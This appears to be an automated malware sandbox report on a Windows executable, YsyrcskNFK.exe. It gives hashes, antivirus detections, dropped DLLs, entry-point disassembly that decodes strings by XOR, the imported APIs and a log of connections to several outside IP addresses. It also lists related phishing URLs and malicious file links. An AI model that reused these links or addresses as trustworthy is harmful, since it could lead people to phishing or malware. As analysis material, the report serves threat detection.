                                                                                                                                                                    https://infognition.com/ScreenPressor/ScreenPressor4.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 78.47.156.184
                                                                                                                                                                    bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 144.76.166.199
                                                                                                                                                                    bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 159.69.63.226
                                                                                                                                                                    AKAMAI-ASN1EUEy6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 172.234.222.143
                                                                                                                                                                    SecuriteInfo.com.ELF.Mirai-CTV.17056.24722.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 172.236.28.137
                                                                                                                                                                    http://cremis.co.jp/oscommerce/catalog/redirect.php?action=url&goto=m8746liv.dallasnews24.comhttps://ohyeah.jp/redirect.php?action=url&goto=google.com.////amp/chungcusungrouphalong.vn/log/5QpvB8K2/ZWdheXRhbkBpZHNyZWFsZXN0YXRlLmNvbQ==$%E3%80%82&c=E,1,WIsK-Pp3fpUtsfHSA8-xzLJpUhIWthdkIPcm9_R7RXGcgUnYnPVSB6XUBjqIvsMquxANN6Vw0E_RWm4aP1d6oCkGO5HUfUouEOY2VUcZ&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 172.233.39.205
                                                                                                                                                                    Play_VM-NowBarry.doanAudiowav012.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 23.197.127.142
                                                                                                                                                                    Amex Message.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 23.55.163.73
                                                                                                                                                                    https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFkILOsO1UnLItklUwD68rhtr94fRPJI4HAEjYZ7vdlgHTiHU_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZPRzSyzWe4FlQQyqQA-2BOTqGjWjoN-2BuPm4tzM5LM6f6tO2PXKa74YSjAhzL6onG-2BuKO989bZZj9vupVvXtBWU0qXeI6VZny9p-2FgjssbU9Je1I2RDoZPOLgxX8gxf2-2BzsuoGYoVqnaS5CYR1Z5WEWAcZP0wmQbm4ikqer-2BGrlVppyDdPw-2BxPiObQZTbU2ZeclEy9V5nUC-2BnwlvdDmQwsjghHkHuJFiwInVWpyiCgGFo0uYjlPs3G8hdAgJBJu-2F-2B0K864-3D#ZmluYW5jZUBjbGVhcnZpZXcuYWk=Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 184.50.204.201
                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 23.200.0.42
                                                                                                                                                                    https://icrealtime.com/downloads/2Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 88.221.110.145
                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 23.200.0.9
                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 23.200.0.9
                                                                                                                                                                    No context
                                                                                                                                                                    No context
                                                                                                                                                                    Process:C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):25600
                                                                                                                                                                    Entropy (8bit):6.020686022652244
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:PXd6ULZam2bCNifL0/QzGMqGEN4fn7NgjNdUPjQ2fu/MB8TMxs1wHMkGPMlj1ju:PXjLZJ2bXfqQKMq+gjTAfu/MB8QKpKB
                                                                                                                                                                    MD5:EB9474598B42C55CC62D098B8C5D8B7E
                                                                                                                                                                    SHA1:1D73F3DA3C1BA4DEA3EE051E41CF8B991685B8EF
                                                                                                                                                                    SHA-256:7CD473A4B131E8BEB8F9BAAE5876D47A74D7DFE0AD76B5F189DDE8FBE0285E91
                                                                                                                                                                    SHA-512:E6D84DC5C513AA41ED053BA2BC113346D7CAEC5D782871A5D72803C64B3D54B93236F1563B1FA545590FE72EA80DA5DFD78ED5CD7C59FA2C921CEF34AA2FC54E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.H...........#...8.@... .......D.......P................................................ .........................1.......L...............................\....................................................................................text...(?.......@.................. ..`.data...@....P.......D..............@....rdata.......`.......L..............@..@.bss.........p...........................edata..1............X..............@..@.idata..L............Z..............@....reloc..\............`..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):86213
                                                                                                                                                                    Entropy (8bit):5.789288613189995
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:Tn8HM5s39vkq0xEOkhzQLX7v5uZnK5NlemmuLbR+PDl+JTs8SCd+CSPDoP6rW/pn:oHpt8q03mUqWoPB8TvSrtXrXelN7DTP
                                                                                                                                                                    MD5:C8E10032CC45E75F980A842E1AEBDFF3
                                                                                                                                                                    SHA1:2FF21D906A0C6B6115634B2C5F42EB49E46BF0BF
                                                                                                                                                                    SHA-256:5FF09D0FC80378877AC089FB9AFE193E25BF54E737AA4473A69D2DC0F4C546F8
                                                                                                                                                                    SHA-512:07D6CB95AD711A4CD1201494CABA588121A1D85DFE9F528F0E1155BED13CC53F7282B3A0EFA4E4B8CC74930BF63957774E6BB1C73DD1F6B48602DEBEB0FDFD52
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:GP......................J...............................................+..F.+^bcy*zxemxkg*ikdde~*ho*x.d*cd*NEY*geno$...........ZO..F....F.B...............2.R...........0.......z....J..........................J......x.........*..............................:......................................................................................................................$~or~....].......j..................*..j$nk~k........z.......z..............J...$xnk~k..j...........................J..J$hyy....z....*.......*..................$cnk~k.......:.......:..............J...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\YsyrcskNFK.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):86213
                                                                                                                                                                    Entropy (8bit):5.789288613189995
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:eLxqBt1sJw5pVNUP1/kvtbWcpmCKXakXDlXvqL/OSBw7N4foYGpFdSEL8DhPZZ6q:BteqGDlXvCDB04f5Gn/L8NRel17wefbw
                                                                                                                                                                    MD5:48916C39188D7A1ECD7618B9622D925C
                                                                                                                                                                    SHA1:5873E40607AE6B6EE543E08AE35BB473A3DE06E8
                                                                                                                                                                    SHA-256:EFACE790B3A34FA4A326FE72B9DF748380C3AE15C8D8BB929B4CB274445B233B
                                                                                                                                                                    SHA-512:6FCE97F950207A2F6AA3DF2E9F19C1AEC24AA70010C4995084E34A155AB6A65149D10FF4008CE65AFE410BA3B29B367EA8A1E59DBD63AE3E3E3D65461169D0E9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.H...............8.X...........:.......p....@..........................@......r......... ..............................0.......................................................................................................................text....W.......`.................. ..`.data........p.......p..............@....rdata..`...........................@..@.bss....p.... ....... ...................idata.......0.......0..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5120
                                                                                                                                                                    Entropy (8bit):3.4855350111432437
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:6/bHgJ2GVhcus1lli4NbE2eMGjofSA8YDITcSd3MA3MMIv0BvcvXQ3:yAJ2G6Vx5EUGU6wIASdcAcHvA3
                                                                                                                                                                    MD5:F37B21C00FD81BD93C89CE741A88F183
                                                                                                                                                                    SHA1:B2796500597C68E2F5638E1101B46EAF32676C1C
                                                                                                                                                                    SHA-256:76CF016FD77CB5A06C6ED4674DDC2345E8390C010CF344491A6E742BAF2C0FB0
                                                                                                                                                                    SHA-512:252FE66DEA9A4B9AEBC5FD2F24434719CB25159BA51549D9DE407F44B6A2F7BCE6E071BE02C4F2AD6AEF588C77F12C00ED415EB54F96DEC1B077326E101CE0F4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ao.H...........#...8..................... ...............................`................ ......................0..5....@...............................P..@....................................................................................text............................... ..`.data...`.... ......................@....edata..5....0......................@..@.idata.......@......................@....reloc..@....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Entropy (8bit):5.789288613189995
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • VXD Driver (31/22) 0.00%
                                                                                                                                                                    File name:YsyrcskNFK.exe
                                                                                                                                                                    File size:86'213 bytes
                                                                                                                                                                    MD5:48916c39188d7a1ecd7618b9622d925c
                                                                                                                                                                    SHA1:5873e40607ae6b6ee543e08ae35bb473a3de06e8
                                                                                                                                                                    SHA256:eface790b3a34fa4a326fe72b9df748380c3ae15c8d8bb929b4cb274445b233b
                                                                                                                                                                    SHA512:6fce97f950207a2f6aa3df2e9f19c1aec24aa70010c4995084e34a155ab6a65149d10ff4008ce65afe410ba3b29b367ea8a1e59dbd63ae3e3e3d65461169d0e9
                                                                                                                                                                    SSDEEP:768:eLxqBt1sJw5pVNUP1/kvtbWcpmCKXakXDlXvqL/OSBw7N4foYGpFdSEL8DhPZZ6q:BteqGDlXvCDB04f5Gn/L8NRel17wefbw
                                                                                                                                                                    TLSH:48834B4EB6BE0672C4E9077504F74FF6EFB7F27232226AC163D159AE0942212D62934D
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.H...............8.X...........:.......p....@..........................@......r......... ............................
                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                    Entrypoint:0x403a19
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                    Time Stamp:0x48AD4CC2 [Thu Aug 21 11:08:50 2008 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:c1246ca9ec291149221a5cbc329bf1a2
                                                                                                                                                                    Instruction
                                                                                                                                                                    push ebp
                                                                                                                                                                    push edi
                                                                                                                                                                    push esi
                                                                                                                                                                    push ebx
                                                                                                                                                                    mov eax, 0000148Ch
                                                                                                                                                                    call 00007F9BC8DEB3CEh
                                                                                                                                                                    call 00007F9BC8DEB609h
                                                                                                                                                                    mov dword ptr [00412270h], eax
                                                                                                                                                                    mov dword ptr [004120D0h], 00000094h
                                                                                                                                                                    sub esp, 0Ch
                                                                                                                                                                    push 004120D0h
                                                                                                                                                                    call 00007F9BC8DEB5F5h
                                                                                                                                                                    mov eax, 00000000h
                                                                                                                                                                    add esp, 0Ch
                                                                                                                                                                    xor byte ptr [eax+00407000h], FFFFFFD4h
                                                                                                                                                                    inc eax
                                                                                                                                                                    cmp eax, 06h
                                                                                                                                                                    jne 00007F9BC8DE89C5h
                                                                                                                                                                    mov al, 00h
                                                                                                                                                                    xor byte ptr [eax+00407007h], FFFFFFD4h
                                                                                                                                                                    inc eax
                                                                                                                                                                    cmp eax, 0Ch
                                                                                                                                                                    jne 00007F9BC8DE89C5h
                                                                                                                                                                    sub esp, 0Ch
                                                                                                                                                                    push 00407007h
                                                                                                                                                                    call 00007F9BC8DEB564h
                                                                                                                                                                    mov ebx, eax
                                                                                                                                                                    add esp, 0Ch
                                                                                                                                                                    cmp dword ptr [004120E0h], 02h
                                                                                                                                                                    je 00007F9BC8DE8A05h
                                                                                                                                                                    mov eax, 00000000h
                                                                                                                                                                    xor byte ptr [eax+00407014h], FFFFFFD4h
                                                                                                                                                                    inc eax
                                                                                                                                                                    cmp eax, 16h
                                                                                                                                                                    jne 00007F9BC8DE89C5h
                                                                                                                                                                    sub esp, 08h
                                                                                                                                                                    push 00407014h
                                                                                                                                                                    push ebx
                                                                                                                                                                    call 00007F9BC8DEB59Eh
                                                                                                                                                                    add esp, 08h
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F9BC8DE89DEh
                                                                                                                                                                    sub esp, 08h
                                                                                                                                                                    push 00000001h
                                                                                                                                                                    push 00000000h
                                                                                                                                                                    call eax
                                                                                                                                                                    add esp, 08h
                                                                                                                                                                    sub esp, 04h
                                                                                                                                                                    push 00000104h
                                                                                                                                                                    lea eax, dword ptr [esp+00001390h]
                                                                                                                                                                    push eax
                                                                                                                                                                    push 00000000h
                                                                                                                                                                    call 00007F9BC8DEB57Ch
                                                                                                                                                                    add esp, 04h
                                                                                                                                                                    call 00007F9BC8DEB57Ch
                                                                                                                                                                    mov edx, 00407000h
                                                                                                                                                                    call 00007F9BC8DF5F05h
                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x130000x8d4.idata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x57d80x60004c4ef859e1d9380b34ec090f88cc4c25False0.4677734375data5.742590786826368IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x70000x9ca00xa0005b821cd697a1e782d9d1e1bc361f361fFalse0.4494873046875data5.827762505611442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rdata0x110000x5600x1000a8ae9b29f26dc7c53d6b8b923fbacc7aFalse0.32421875data3.2085085907294957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .bss0x120000x3700x1000d8cc59e9549addcfde83072c20c6050aFalse0.0400390625data0.3298848203738673IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .idata0x130000x8d40x100016681774c8a49a56c6b99e2da8d25776False0.303466796875data3.6798140238630337IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    DLLImport
                                                                                                                                                                    ADVAPI32.DLLRegCloseKey, RegCreateKeyA, RegCreateKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, RegSetValueExW
                                                                                                                                                                    KERNEL32.dllCloseHandle, CreateFileA, CreateMutexA, CreateProcessA, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, GetCommandLineA, GetComputerNameA, GetCurrentProcessId, GetCurrentThreadId, GetFileSize, GetFileTime, GetLastError, GetModuleFileNameA, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetSystemDirectoryA, GetSystemTimeAsFileTime, GetTempFileNameA, GetTempPathA, GetTickCount, GetVersionExA, HeapAlloc, HeapFree, HeapReAlloc, LoadLibraryA, OpenProcess, Process32First, Process32Next, ReadFile, SetFileAttributesA, SetFilePointer, SetFileTime, SetPriorityClass, Sleep, TerminateProcess, VirtualAlloc, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiA, lstrcpyA, lstrlenA
                                                                                                                                                                    USER32.dllExitWindowsEx, wsprintfA
                                                                                                                                                                    WS2_32.DLLWSAGetLastError, WSAStartup, closesocket, connect, gethostbyname, getsockopt, htons, inet_addr, ioctlsocket, recv, select, send, socket
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Sep 7, 2024 15:33:55.260860920 CEST4971080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:33:55.265717030 CEST804971088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:55.265799046 CEST4971080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:33:55.266563892 CEST4971080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:33:55.271379948 CEST804971088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:55.271552086 CEST4971080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:33:57.033530951 CEST4971180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:57.038402081 CEST8049711172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:57.038475990 CEST4971180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:57.038599968 CEST4971180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:57.043371916 CEST8049711172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:57.525052071 CEST8049711172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:57.525219917 CEST4971180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:57.525351048 CEST8049711172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:57.525398016 CEST4971180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.489914894 CEST4971280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.499128103 CEST804971245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:58.499377012 CEST4971280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.508960009 CEST4971280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.509782076 CEST4971380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.515012026 CEST804971245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:58.515114069 CEST4971280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.515564919 CEST8049713172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:58.515639067 CEST4971380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.524586916 CEST4971380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:58.530688047 CEST8049713172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.015506029 CEST8049713172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.015532970 CEST8049713172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.015732050 CEST4971380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.015769958 CEST4971380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.758815050 CEST4971480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.763627052 CEST804971445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.763972998 CEST4971480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.774638891 CEST4971480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.775096893 CEST4971580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.781488895 CEST8049715172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.781503916 CEST804971445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.781614065 CEST4971480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.781615973 CEST4971580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.790144920 CEST4971580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:33:59.797847033 CEST8049715172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.285989046 CEST8049715172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.286062956 CEST8049715172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.286127090 CEST4971580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.286257029 CEST4971580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.568280935 CEST4971680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.573173046 CEST804971645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.573255062 CEST4971680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.573348999 CEST4971680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.573889017 CEST4971780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.578438044 CEST804971645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.578488111 CEST4971680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.578654051 CEST8049717172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.578710079 CEST4971780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.578800917 CEST4971780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:00.583698988 CEST8049717172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:01.091180086 CEST8049717172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:01.091217041 CEST8049717172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:01.091312885 CEST4971780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:01.097610950 CEST4971780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:02.738573074 CEST4971980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:02.743437052 CEST804971988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:02.743536949 CEST4971980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:02.743690014 CEST4971980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:02.744323015 CEST4972080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:02.748708963 CEST804971988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:02.748804092 CEST4971980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:02.749228001 CEST8049720172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:02.749298096 CEST4972080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:02.749423027 CEST4972080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:02.754143953 CEST8049720172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.254664898 CEST8049720172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.254712105 CEST8049720172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.254808903 CEST4972080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:03.254863024 CEST4972080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:03.388628960 CEST4972180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:03.393549919 CEST804972164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.393635988 CEST4972180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:03.399507046 CEST4972180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:03.400036097 CEST4972280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:03.404478073 CEST804972164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.404541969 CEST4972180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:03.404830933 CEST8049722172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.404892921 CEST4972280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:03.415193081 CEST4972280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:03.420176029 CEST8049722172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.889466047 CEST8049722172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.889626980 CEST4972280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:03.889645100 CEST8049722172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.889697075 CEST4972280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:04.629160881 CEST4972380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:04.633970976 CEST804972388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:04.634037018 CEST4972380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:04.634128094 CEST4972380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:04.634567976 CEST4972480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:04.639204025 CEST804972388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:04.639322996 CEST4972380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:04.639345884 CEST8049724172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:04.639411926 CEST4972480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:04.645740986 CEST4972480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:04.650542974 CEST8049724172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:05.126940012 CEST8049724172.234.222.138192.168.2.12
